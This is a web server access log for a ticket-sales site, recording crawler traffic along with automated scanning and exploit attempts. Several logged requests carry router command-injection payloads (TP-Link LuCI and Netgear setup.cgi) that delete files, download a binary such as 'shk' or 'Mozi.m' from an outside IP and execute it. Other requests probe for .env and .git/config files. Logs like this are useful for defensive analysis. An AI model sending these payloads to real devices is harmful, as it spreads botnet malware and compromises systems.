[07/Jul/2024:11:52:31 +0200] "GET /ticket2/opencms/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 - 83.97.73.245 - - [07/Jul/2024:11:52:37 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 66.249.66.162 - - [07/Jul/2024:12:07:17 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 66.249.66.162 - - [07/Jul/2024:12:07:17 +0200] "GET /ticket2/opencms/en/venue/?countryid=E317C19B-53AA-3539-EAD3-8DD7161AE012 HTTP/1.1" 200 93922 66.249.66.162 - - [07/Jul/2024:12:08:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088 66.249.66.161 - - [07/Jul/2024:12:08:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229 66.249.66.161 - - [07/Jul/2024:12:08:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 66.249.66.162 - - [07/Jul/2024:12:08:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583 66.249.66.160 - - [07/Jul/2024:12:08:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672 66.249.66.160 - - [07/Jul/2024:12:08:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3928 66.249.66.161 - - [07/Jul/2024:12:08:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338 66.249.66.161 - - [07/Jul/2024:12:08:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737 66.249.66.160 - - [07/Jul/2024:12:08:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187 66.249.66.161 - - [07/Jul/2024:12:08:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175 4.151.218.131 - - [07/Jul/2024:12:14:49 +0200] "GET /ticket2/opencms/owa/auth/logon.aspx HTTP/1.1" 404 - 185.242.226.109 - - [07/Jul/2024:12:23:56 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.242.226.109 - - [07/Jul/2024:12:23:57 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 45.148.10.174 - - [07/Jul/2024:12:54:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:12:54:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 83.97.73.245 - - [07/Jul/2024:13:28:11 +0200] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 - 87.121.69.27 - - [07/Jul/2024:13:34:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 165.227.221.222 - - [07/Jul/2024:13:39:49 +0200] "GET /geoserver/web/ HTTP/1.1" 404 - 52.167.144.137 - - [07/Jul/2024:13:51:49 +0200] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9 HTTP/1.1" 200 73815 94.156.68.162 - - [07/Jul/2024:14:01:30 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 94.156.68.162 - - [07/Jul/2024:14:02:42 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 94.156.10.163 - - [07/Jul/2024:14:07:41 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 185.191.171.5 - - [07/Jul/2024:14:14:44 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 85.208.96.201 - - [07/Jul/2024:14:14:45 +0200] "GET /ticket2/opencms/en/handbook_buyer/ HTTP/1.1" 200 71127 40.77.167.32 - - [07/Jul/2024:14:43:21 +0200] "GET /ticket2/opencms/en/venue/?countryid=15679D6D-1531-2ADE-1A00-1D43A92EB55E HTTP/1.1" 200 93013 91.92.244.183 - - [07/Jul/2024:14:43:21 +0200] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 - 85.208.96.208 - - [07/Jul/2024:14:56:25 +0200] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/chelsea/ HTTP/1.1" 200 65140 94.156.10.163 - - [07/Jul/2024:15:04:16 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 161.35.164.134 - - [07/Jul/2024:15:27:28 +0200] "GET / HTTP/1.1" 404 - 161.35.164.134 - - [07/Jul/2024:15:27:28 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 87.121.69.27 - - [07/Jul/2024:15:28:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 185.191.171.19 - - [07/Jul/2024:15:50:25 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 185.191.171.10 - - [07/Jul/2024:15:50:26 +0200] "GET /ticket2/opencms/en/buy/ HTTP/1.1" 200 63824 78.153.140.179 - - [07/Jul/2024:16:20:32 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 104.168.70.165 - - [07/Jul/2024:16:21:17 +0200] "GET / HTTP/1.1" 404 - 118.193.58.20 - - [07/Jul/2024:16:46:09 +0200] "�V???B?M"? ??i7??!De?-?i|??? ???[*`)0BT???$???_????>???" 400 - 118.193.58.20 - - [07/Jul/2024:16:46:19 +0200] "GET / HTTP/1.1" 404 - 118.193.58.20 - - [07/Jul/2024:16:46:37 +0200] "GET /favicon.ico HTTP/1.1" 404 - 118.193.58.20 - - [07/Jul/2024:16:46:37 +0200] "GET /robots.txt HTTP/1.1" 404 - 118.193.58.20 - - [07/Jul/2024:16:46:37 +0200] "GET /sitemap.xml HTTP/1.1" 404 - 94.156.10.163 - - [07/Jul/2024:16:59:57 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 114.119.151.107 - - [07/Jul/2024:17:03:56 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 45.148.10.174 - - [07/Jul/2024:17:04:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:17:04:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 8.218.73.108 - - [07/Jul/2024:17:14:58 +0200] "GET /geoserver/web/ HTTP/1.1" 404 - 87.121.69.27 - - [07/Jul/2024:17:31:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 212.102.57.145 - - [07/Jul/2024:17:46:09 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 - 52.167.144.229 - - [07/Jul/2024:17:50:53 +0200] "GET /ticket2/opencms/en/venue/?countryid=FF003B65-76E6-22ED-7100-B7664691B6BF HTTP/1.1" 200 93013 40.77.167.77 - - [07/Jul/2024:17:58:09 +0200] "GET /ticket2/opencms/en/venue/?countryid=6994D0E6-4880-D162-87F9-DDDE5D63EE86 HTTP/1.1" 200 104896 94.156.10.163 - - [07/Jul/2024:18:07:16 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 78.153.140.177 - - [07/Jul/2024:18:07:33 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 114.119.146.98 - - [07/Jul/2024:18:14:58 +0200] "GET /ticket2/opencms/admin/index.html HTTP/1.1" 401 - 35.195.123.144 - - [07/Jul/2024:18:16:03 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 114.119.130.60 - - [07/Jul/2024:18:18:08 +0200] "GET /ticket2/opencms/en/venue/?venueid=593AF726-0A01-6DBE-E6B0-2BCB42342E04 HTTP/1.1" 200 63636 85.208.96.205 - - [07/Jul/2024:18:20:02 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 185.191.171.3 - - [07/Jul/2024:18:20:03 +0200] "GET /ticket2/opencms/sv/buy/ HTTP/1.1" 200 65243 51.8.223.89 - - [07/Jul/2024:18:27:24 +0200] "GET / HTTP/1.1" 404 - 141.98.83.197 - - [07/Jul/2024:18:45:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [07/Jul/2024:18:45:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:19:02:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:19:02:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 94.156.10.163 - - [07/Jul/2024:19:05:20 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 87.121.69.27 - - [07/Jul/2024:19:07:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 51.79.19.53 - - [07/Jul/2024:19:09:31 +0200] "GET /geoserver/web/ HTTP/1.1" 404 - 85.208.96.202 - - [07/Jul/2024:19:16:01 +0200] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/liverpool/ HTTP/1.1" 200 66512 40.77.167.77 - - [07/Jul/2024:19:17:37 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/ligue_1/bordeaux/ HTTP/1.1" 200 69791 52.167.144.206 - - [07/Jul/2024:19:50:42 +0200] "GET /ticket2/opencms/en/sport/ HTTP/1.1" 200 62744 91.92.249.130 - - [07/Jul/2024:20:09:14 +0200] "GET /ticket2/opencms/RDWeb/Pages/en-US/login.aspx HTTP/1.1" 404 - 83.97.73.245 - - [07/Jul/2024:20:12:58 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 - 52.167.144.186 - - [07/Jul/2024:20:19:27 +0200] "GET /ticket2/opencms/en/buy/?comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=3A56B1C2-6FFB-C8D1-B229-B3914D5FF8DF HTTP/1.1" 200 67634 83.97.73.245 - - [07/Jul/2024:20:33:44 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 - 114.119.146.98 - - [07/Jul/2024:20:53:27 +0200] "GET /ticket2/opencms/en/venue/?venueid=92233AC7-CC90-63C9-F1D7-B8EB5BC2857C HTTP/1.1" 200 63639 52.167.144.161 - - [07/Jul/2024:20:55:07 +0200] "GET /ticket2/opencms/en/venue/?countryid=7A0460DD-50B2-C9A6-7233-3106FD73A000 HTTP/1.1" 200 93013 91.92.244.183 - - [07/Jul/2024:20:59:18 +0200] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 - 94.228.169.169 - - [07/Jul/2024:21:22:31 +0200] "GET / HTTP/1.1" 404 - 94.228.169.169 - - [07/Jul/2024:21:22:31 +0200] "GET / HTTP/1.1" 404 - 85.208.96.212 - - [07/Jul/2024:21:25:09 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 185.191.171.18 - - [07/Jul/2024:21:25:10 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/manchester_united/ HTTP/1.1" 200 70374 66.249.69.98 - - [07/Jul/2024:21:29:02 +0200] "GET /ticket2/opencms/en/venue/?venueid=2670EAEE-B3EE-DCB5-D526-2AB4D4F780CA HTTP/1.1" 200 63694 66.249.69.99 - - [07/Jul/2024:21:29:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868 66.249.69.98 - - [07/Jul/2024:21:29:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39340 66.249.69.98 - - [07/Jul/2024:21:29:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939 66.249.69.99 - - [07/Jul/2024:21:29:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221 66.249.69.99 - - [07/Jul/2024:21:29:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71024 52.167.144.22 - - [07/Jul/2024:21:45:30 +0200] "GET /ticket2/opencms/en/venue/?countryid=A6670E01-CE49-A608-C597-250C3D48D088 HTTP/1.1" 200 93013 46.101.77.198 - - [07/Jul/2024:21:46:55 +0200] "GET /ticket2/opencms/ab2g HTTP/1.1" 404 - 46.101.77.198 - - [07/Jul/2024:21:46:56 +0200] "GET /ticket2/opencms/ab2h HTTP/1.1" 404 - 46.101.77.198 - - [07/Jul/2024:21:46:56 +0200] "GET /ticket2/opencms/alive.php HTTP/1.1" 404 - 46.101.77.198 - - [07/Jul/2024:21:46:57 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 46.101.77.198 - - [07/Jul/2024:21:46:58 +0200] "GET /ticket2/opencms/t4 HTTP/1.1" 404 - 46.101.77.198 - - [07/Jul/2024:21:46:58 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 46.101.77.198 - - [07/Jul/2024:21:46:58 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 46.101.77.198 - - [07/Jul/2024:21:46:59 +0200] "GET /ticket2/opencms/teorema505?t=1 HTTP/1.1" 404 - 52.76.71.100 - - [07/Jul/2024:21:56:48 +0200] "GET /favicon.ico HTTP/1.1" 404 - 147.185.132.106 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 147.185.132.106 - - [07/Jul/2024:22:03:18 +0200] "�?��?????x*Y??dA??soP|??k0%??<???rS��h???/?+?0?,???'?#?? ?(?$?? " 400 - 52.160.33.137 - - [07/Jul/2024:22:13:58 +0200] "GET /ticket2/opencms/owa/auth/x.js HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:22:32:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [07/Jul/2024:22:32:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 114.119.149.199 - - [07/Jul/2024:22:32:59 +0200] "GET /ticket2/opencms/en/venue/?venueid=647A017A-A337-874C-385C-B1E6DFFA2A10 HTTP/1.1" 200 63654 40.77.167.38 - - [07/Jul/2024:22:33:47 +0200] "GET /ticket2/opencms/en/venue/?countryid=87A0CCAA-3D1F-51AB-962B-6BBE856D2C40 HTTP/1.1" 200 93013 52.167.144.190 - - [07/Jul/2024:23:14:42 +0200] "GET /ticket2/opencms/en/venue/?venueid=B5F8506A-F94F-2596-19B1-8EAC93A69524 HTTP/1.1" 200 63600 106.119.203.52 - - [07/Jul/2024:23:32:48 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://106.119.203.52:36317/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - 41.236.155.206 - - [07/Jul/2024:23:48:09 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -